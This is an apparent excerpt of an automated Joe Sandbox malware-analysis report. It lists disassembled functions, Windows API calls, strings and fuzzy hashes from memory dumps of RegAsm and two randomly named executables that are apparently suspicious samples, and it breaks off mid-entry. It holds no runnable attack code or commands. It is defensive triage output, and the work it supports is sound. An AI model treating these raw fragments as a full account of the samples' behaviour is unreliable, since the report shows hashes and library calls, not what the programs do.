Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction ID: fc6d2ca4dc19ba0b715d37a90518746425c4eaa4db822c587b4b2213400e0bc5
Opcode Fuzzy Hash: c0cf26b477ce003e2ec9021a6fbfbc89d90c79d8eb5fc1b2203591be7fd8a1bc
Instruction Fuzzy Hash: 6F519F71A0A60587CB157714DA413EB3B90AB00711F644D6BE8A1463E9EB7D8CF2DA8F

Function 00401E50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408080: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407F9B,?,?,?,?,00407F9B,0000000C,00432FA4,0000000C), ref: 004080E0

Strings

ios_base::failbit set, xrefs: 00401E62
ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 50fcd3a1a371244ec7a0f3f24a710ecb3351835c0196af839c5ad707446f783d
Instruction ID: 4f5bf0a45fc4208832a8654eef8c337e9c06d50c54c87a988f481c954303cb93
Opcode Fuzzy Hash: 50fcd3a1a371244ec7a0f3f24a710ecb3351835c0196af839c5ad707446f783d
Instruction Fuzzy Hash: 7F4147B1504305AFC304DF29C841A9BF7E8EF89310F14862FF994A76A1E778E945CB99

Function 0040A420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0040A45F
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A513

Strings

csm, xrefs: 0040A4FD

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction ID: 18bede24dd224cfa91d1e00103c3baabbd685d05025061fa587fd2bb58ff80c9
Opcode Fuzzy Hash: ca5a29bd391d885cd4634227e419514380eff920c463d90092caad24f93c2f58
Instruction Fuzzy Hash: 8041D934A002189BCF10DF69C885A9E7BB0FF44318F14817BE8146B3D2D779A921CB9A

Function 0040AD2D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0040AD52

Strings

RCC, xrefs: 0040AD6C
MOC, xrefs: 0040AD64

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction ID: 578a82eb6ed92837561ac62ae5e682fef8a2830442736a5cd94d75dd4d38702e
Opcode Fuzzy Hash: 5b710ab2a9f474c2cc4afd51bace25907f511bb75432380764933eab186ad071
Instruction Fuzzy Hash: 2F417D71900209AFCF16DF94CD81AEEBBB5FF48304F19406AF9047B291D3399960DB95

Function 00407413 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407D98
___raise_securityfailure.LIBCMT ref: 00407E80

Strings

@SC, xrefs: 00407E7B

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: 42319827a0e0b74c587616dcc60c70791287d7417a5014e862dc5be5bea1f8a0
Instruction ID: c5c0fd815b2f08e14ceb602fe243d88e4d65426d2e31bcd62793ea7bd9420f3f
Opcode Fuzzy Hash: 42319827a0e0b74c587616dcc60c70791287d7417a5014e862dc5be5bea1f8a0
Instruction Fuzzy Hash: 972104B4640A009BD328CF15FD857983BF4BB68359FA0643AE9088B3B0D3B46484CF1E

Function 00407E93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407E9E
___raise_securityfailure.LIBCMT ref: 00407F5B

Strings

@SC, xrefs: 00407F56

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: @SC
API String ID: 3761405300-4053289583
Opcode ID: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction ID: 2125179719012bf3b699bacd38cc00c528494cfbc9043f550ba33f2ea8b81d37
Opcode Fuzzy Hash: ee42222a1a21f84a104741ef492a216a118de1db3b1281724e16a62be68f0859
Instruction Fuzzy Hash: DC11E3B4651A04DBC318CF15F8817883BB4BB28346B50B03AE8088B371E3B4A5958F5E

Function 00401870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00401875
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004018BA

Part of subcall function 0040589A: _Yarn.LIBCPMT ref: 004058B9
Part of subcall function 0040589A: _Yarn.LIBCPMT ref: 004058DD

Strings

bad locale name, xrefs: 004018C8

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction ID: fbb5483a5c0b3d6c860fa312477ba2c73c4b5eacc305877fe335d4945849315c
Opcode Fuzzy Hash: 72551ae77e736be2171b1fcc8d603e91bdd62b17c33b334120392a8c0c99013b
Instruction Fuzzy Hash: D8F01261505B508ED370DF368404743BEE0AF25714F048E2ED4C9D7A91D379E508CBA9

Function 00405AAE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405AB5

Strings

pdB, xrefs: 00405AF1
1]@, xrefs: 00405ADB

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID: 1]@$pdB
API String ID: 431132790-2574904542
Opcode ID: 73ce1e61eeabf46a09a1e5cf8c5bfbef05ff3b583e132448a225ea9f7212eaca
Instruction ID: 123d69972286fd69fb551aecc998dcfff066a917831aeb16d417dea724d1ca27
Opcode Fuzzy Hash: 73ce1e61eeabf46a09a1e5cf8c5bfbef05ff3b583e132448a225ea9f7212eaca
Instruction Fuzzy Hash: 1B01D6B4A00715CFC761DF28C540A5ABBF0FF08318B51896EE48ADB751D776AA40CF48

Function 004012D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004012D5

Part of subcall function 004055CE: std::invalid_argument::invalid_argument.LIBCONCRT ref: 004055DA

___std_exception_copy.LIBVCRUNTIME ref: 004012FC

Strings

string too long, xrefs: 004012D0

Memory Dump Source

Source File: 0000000E.00000002.2004782582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: 26fc9a0f88cba3b3d08977187bf2055019bce32afe2b0aefe6f2504baa2ffc18
Instruction ID: 272e35dc6304a19a67255a0f261e943e5561bca0c73071cc2d95ade12bed5fb2
Opcode Fuzzy Hash: 26fc9a0f88cba3b3d08977187bf2055019bce32afe2b0aefe6f2504baa2ffc18
Instruction Fuzzy Hash: DEE0C2B2A343119BD200AF94AC01986B6D99F55314712CA2FF444F3200F3B8A8808768

Analysis Process: CZjRdKVnFB.exePID: 4536, Parent PID: 3872COMMON

Executed Functions

Function 02B9C8A0 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B9CB06

Memory Dump Source

Source File: 0000000F.00000002.2018274334.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b90000_CZjRdKVnFB.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e4f0c4ec2d55a346a3317ff5048fa53ce57672975cc4523782d1fe03095c2bad
Instruction ID: 85bfd3d2ebb2f7ed3ecc64dae5076e91a8cbe4e40fda20e559d3f87c6307550d
Opcode Fuzzy Hash: e4f0c4ec2d55a346a3317ff5048fa53ce57672975cc4523782d1fe03095c2bad
Instruction Fuzzy Hash: 56812370A00B059FDB25DF29D48579ABBF1FF88304F00896AD48AD7A40DB74E949CB90

Function 02B9456C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B95A49

Memory Dump Source

Source File: 0000000F.00000002.2018274334.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b90000_CZjRdKVnFB.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8a67de9f4ca4c9ea793b7b1ab12bfef84e1474b0eab45da46bfab06a3dd936fb
Instruction ID: 1f3eb33fef1923ac881282855e72daa86b0c5c95c98e747eff4ffccf85d36c11
Opcode Fuzzy Hash: 8a67de9f4ca4c9ea793b7b1ab12bfef84e1474b0eab45da46bfab06a3dd936fb
Instruction Fuzzy Hash: EF41C570C0071DCFEB25CFA9C88479EBBB5BF49304F6081AAD418AB251DBB56949CF94

Function 02B9598C Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B95A49

Memory Dump Source

Source File: 0000000F.00000002.2018274334.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b90000_CZjRdKVnFB.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 988048276c7a6f789293db3bbdc00e38bb50353758dbfaed26a16ebae1baee94
Instruction ID: 941acc4be88c680f66ce9a47afe3ef8879d1b2f41b0c4ea399f6262e24e4e120
Opcode Fuzzy Hash: 988048276c7a6f789293db3bbdc00e38bb50353758dbfaed26a16ebae1baee94
Instruction Fuzzy Hash: AC41D1B0C00719CFEB25DFA9C88478EBBB1BF49304F6481AAD418AB251DBB56949CF54

Function 08CB1048 Relevance: 1.6, APIs: 1, Instructions: 79
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageW.USER32(?,?,?,?), ref: 08CB10FD

Memory Dump Source

Source File: 0000000F.00000002.2029891508.0000000008CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8cb0000_CZjRdKVnFB.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f269bde073701d7ce5201a020b40eed0ce710bb2a0d61cae2272be4f2bd990bf
Instruction ID: 06637589a8d06928f392680ecb8bfe525d1d07bdbf95b0f0b8273c931a18de7a
Opcode Fuzzy Hash: f269bde073701d7ce5201a020b40eed0ce710bb2a0d61cae2272be4f2bd990bf
Instruction Fuzzy Hash: 7E2157B6900248DFCB10CFA9D484BDEBBF4EB48220F14845AE409A7250C774A944CFA1

Function 02B9E8C8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B9ED4E,?,?,?,?,?), ref: 02B9EE0F

Memory Dump Source

Source File: 0000000F.00000002.2018274334.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b90000_CZjRdKVnFB.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8b50a7aa32eae555dcab5e7bd76bbcdc7372ee17ac42f94775ccd2a958abed03
Instruction ID: 5927342575b17f5afa1974e95cb9586e6f75ea07e073a5b5fcf36416edc829e9
Opcode Fuzzy Hash: 8b50a7aa32eae555dcab5e7bd76bbcdc7372ee17ac42f94775ccd2a958abed03
Instruction Fuzzy Hash: AF21E5B5900648EFDB10CF9AD984ADEBBF8EF48310F14845AE914A7310D374A954CFA5

Function 02B9ED80 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02B9ED4E,?,?,?,?,?), ref: 02B9EE0F

Memory Dump Source

Source File: 0000000F.00000002.2018274334.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b90000_CZjRdKVnFB.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 748c39c2fda5a9e5e99903546173179d5e77e3581ca5ad895b15b9a2a51721a7
Instruction ID: 19355a20f0817ede75412b273ad8898b4d2d32d3df90c89ba2933a47ca7d7322
Opcode Fuzzy Hash: 748c39c2fda5a9e5e99903546173179d5e77e3581ca5ad895b15b9a2a51721a7
Instruction Fuzzy Hash: E421E5B59012489FDB10CFAAD984ADEBFF8EB48310F14845AE914A7350D378A954CF65

Function 08CB1B09 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32(?,00000000), ref: 08CB1B8C

Memory Dump Source

Source File: 0000000F.00000002.2029891508.0000000008CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8cb0000_CZjRdKVnFB.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 9ee725d531cfc2ef9ac5dae10ffe20a537c5162ca44c88a99aba22d48188dfee
Instruction ID: 4da744178178c7811bc5e477de27dbe12f70f4f9644fea18735a6be1984e04da
Opcode Fuzzy Hash: 9ee725d531cfc2ef9ac5dae10ffe20a537c5162ca44c88a99aba22d48188dfee
Instruction Fuzzy Hash: 842139B1900749DFDB10CF9AC884BDEFBF8FB48221F14842ED818A7200E374A905CB65

Function 08CB1B10 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32(?,00000000), ref: 08CB1B8C

Memory Dump Source

Source File: 0000000F.00000002.2029891508.0000000008CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8cb0000_CZjRdKVnFB.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 90aabb53d974df43fe09469ab62c9e2867ab320a8bc7d8745fa37311d3cdd8ed
Instruction ID: 59190bbe5e34bebdcce4b0231eb7db753b0d9ed7886bc64071638e59b9b46ae1
Opcode Fuzzy Hash: 90aabb53d974df43fe09469ab62c9e2867ab320a8bc7d8745fa37311d3cdd8ed
Instruction Fuzzy Hash: FE2104B19017099FDB10CF9AC884BDEFBF8FB48210F14842ED818A3240D374A905CB65

Function 02B9C578 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B9CB81,00000800,00000000,00000000), ref: 02B9CD92

Memory Dump Source

Source File: 0000000F.00000002.2018274334.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b90000_CZjRdKVnFB.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 189df8b94c0217bc7aa5bd495958970204444e6036d112f35805462d0171af17
Instruction ID: f3fe04a87151308ede9754ff71be6b89b53123c977d03943ea7c7086e746fc9b
Opcode Fuzzy Hash: 189df8b94c0217bc7aa5bd495958970204444e6036d112f35805462d0171af17
Instruction Fuzzy Hash: 891112B69003499FDB10CF9AD844B9EFFF4EF88310F10846AE819A7210C379A945CFA5

Function 02B9CD20 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B9CB81,00000800,00000000,00000000), ref: 02B9CD92

Memory Dump Source

Source File: 0000000F.00000002.2018274334.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b90000_CZjRdKVnFB.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a93c4ace143ff7e65f35f5b1c36b0edbbe196c1b873431b63804a2a353d2775d
Instruction ID: 55a02408fc91a6cdbc414cd505b29095ab81b3dd3abdf40ea264d7e21045e880
Opcode Fuzzy Hash: a93c4ace143ff7e65f35f5b1c36b0edbbe196c1b873431b63804a2a353d2775d
Instruction Fuzzy Hash: 551103B68002499FDB10CFAAD444BDEFFF4EF48310F10846AD819A7210C775A545CFA5

Function 08CBDD23 Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 08CBDD87

Memory Dump Source

Source File: 0000000F.00000002.2029891508.0000000008CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8cb0000_CZjRdKVnFB.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: bf0cbc765c40e741850fbf4db6a3213aed81658853705260f0077743f3863958
Instruction ID: ab00e775e818ca4ad5aeac8060f74c33058ce9f1bcd4fa69329658b55aebaa05
Opcode Fuzzy Hash: bf0cbc765c40e741850fbf4db6a3213aed81658853705260f0077743f3863958
Instruction Fuzzy Hash: 11113671D00749CFDB20DFAAC4457DEFBF4AF48210F24881AC559A7240CB79A544CFA1

Function 02B9CAA0 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B9CB06

Memory Dump Source

Source File: 0000000F.00000002.2018274334.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b90000_CZjRdKVnFB.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6a6d0de7f808fcac6626a3f3c125ee87954a58d6278573889c1de0de4bd7bfdb
Instruction ID: 1e1472520f045667418446fa188dc567e16cd8f20b4be6a7911e2b234d279851
Opcode Fuzzy Hash: 6a6d0de7f808fcac6626a3f3c125ee87954a58d6278573889c1de0de4bd7bfdb
Instruction Fuzzy Hash: 3A11DFB6D006498FDB10CF9AD444B9EFBF4EB88324F14846AD829A7210C379A545CFA1

Function 08CBDD28 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleWindow.KERNELBASE ref: 08CBDD87

Memory Dump Source

Source File: 0000000F.00000002.2029891508.0000000008CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_8cb0000_CZjRdKVnFB.jbxd

Similarity

API ID: ConsoleWindow
String ID:
API String ID: 2863861424-0
Opcode ID: f8dc493fdbcdbac0c2f356a09b3f2c37794f9dcf768801d8339adfa56fe9d481
Instruction ID: 188ed2539034f8206725535462a793d44d8c14c90f072116fe9630834ef7b7a7
Opcode Fuzzy Hash: f8dc493fdbcdbac0c2f356a09b3f2c37794f9dcf768801d8339adfa56fe9d481
Instruction Fuzzy Hash: 6F113371D007498FDB20DFAAC4457DEBBF4AB48220F24881AC459A7240CB79A944CFA1

Function 02B3D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2016061320.0000000002B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b3d000_CZjRdKVnFB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f85a87a026614ae71fcfd0753d98e2637581a66499370cec70292418ed54eacc
Instruction ID: 54707f4d7d8f43c85d9778424a62aa34f070708fe47b81fd96beb7b73c5e3fe8
Opcode Fuzzy Hash: f85a87a026614ae71fcfd0753d98e2637581a66499370cec70292418ed54eacc
Instruction Fuzzy Hash: 2B212572600305EFDB06DF14D9C0B26BB65FB88328F2585A9E8090B257C336D856CAA2

Function 02B4D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2016394842.0000000002B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b4d000_CZjRdKVnFB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27bea7582397af0b0b500985c4793c65b0572575f0b3a7220ac0e838444c23ed
Instruction ID: b1ae05e1cf4f5ce1df351d02efe5e373bcd659967e6b62cdb8886732bf3012c0
Opcode Fuzzy Hash: 27bea7582397af0b0b500985c4793c65b0572575f0b3a7220ac0e838444c23ed
Instruction Fuzzy Hash: 6F210771604305EFDB05DF54D9C0B25BBA5FB84318F24C6ADEC894B252CB36D446DA62

Function 02B4D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2016394842.0000000002B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b4d000_CZjRdKVnFB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a615a2defc3f51df6e4869c5a8662085d8469faa5418f19d290c8c79b79c2655
Instruction ID: cbc3faaf7fc9144ef18a76f45a04c84b6879a73394e59f59996bba1258ac2c40
Opcode Fuzzy Hash: a615a2defc3f51df6e4869c5a8662085d8469faa5418f19d290c8c79b79c2655
Instruction Fuzzy Hash: CF213471604304EFDB14DF24D8D0B26BB61FB84314F20C5ADE80A4B346CB3AE807DA62

Function 02B4D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2016394842.0000000002B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b4d000_CZjRdKVnFB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f909bbe1d446ae6f10fdfe53f38748d50a1cfd021924bebcdbe36cae5690bbed
Instruction ID: 136e91fe724e58ee86f045e897bf6b166eac3cfe183bd0bf1f92cea80091c848
Opcode Fuzzy Hash: f909bbe1d446ae6f10fdfe53f38748d50a1cfd021924bebcdbe36cae5690bbed
Instruction Fuzzy Hash: 322180755083809FCB02CF14D9D4B11BF71EB46214F29C5DAD8498F2A7C33A9846CB62

Function 02B3D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2016061320.0000000002B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b3d000_CZjRdKVnFB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
Instruction ID: 9745d7561b883eb28ce72e9b72b97a8d6ff39183e323bd6803850afba9c7a294
Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
Instruction Fuzzy Hash: 2011BE76504280DFCB16CF10D9C4B16BF72FB88328F25C6A9D8090B657C33AD45ACBA2

Function 02B4D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2016394842.0000000002B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2b4d000_CZjRdKVnFB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction ID: 533a1f0f59b0e1791d4d5d3028c076367df7d6ae5e06cdc1a732d652f3ed4a46
Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
Instruction Fuzzy Hash: D7118B75904280DFCB15CF10D5C4B15FBA1FB84218F24C6A9DC894B696C33AD44ADB62

Analysis Process: rHCHrI9F0v.exePID: 1012, Parent PID: 3872COMMON

Executed Functions

Function 05FA3F50 Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc82640ead32a18f4e08bccd306faa29e67281088cb6168a3c87df46f993fdff
Instruction ID: ae7d88584179781153b4c382fdb2bdb77455792116e0b65614f09f0ad7273277
Opcode Fuzzy Hash: dc82640ead32a18f4e08bccd306faa29e67281088cb6168a3c87df46f993fdff
Instruction Fuzzy Hash: B0127F75F002058FDB14DFB9D494AAEBBF6BF88600B148169E806EB365DB75DC02CB91

Function 05FA67D0 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f911cfc3d5ae82c508455eb18ea1d2f895b850d0aa9ad0445170a341936bad
Instruction ID: 9565fb37dffa3a0c5bedbc1870674f3d2186305221d00c92f4f5e5b088980a82
Opcode Fuzzy Hash: b6f911cfc3d5ae82c508455eb18ea1d2f895b850d0aa9ad0445170a341936bad
Instruction Fuzzy Hash: CFF16E72E002099FDB15DBA8D880B9EBBF2FF88300F148569E505EB261DB35ED45CB91

Function 05FAA3BD Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4865159595fd9bc3255e28008281f3aaede2fb2dc1b582db96309f2485b8af0d
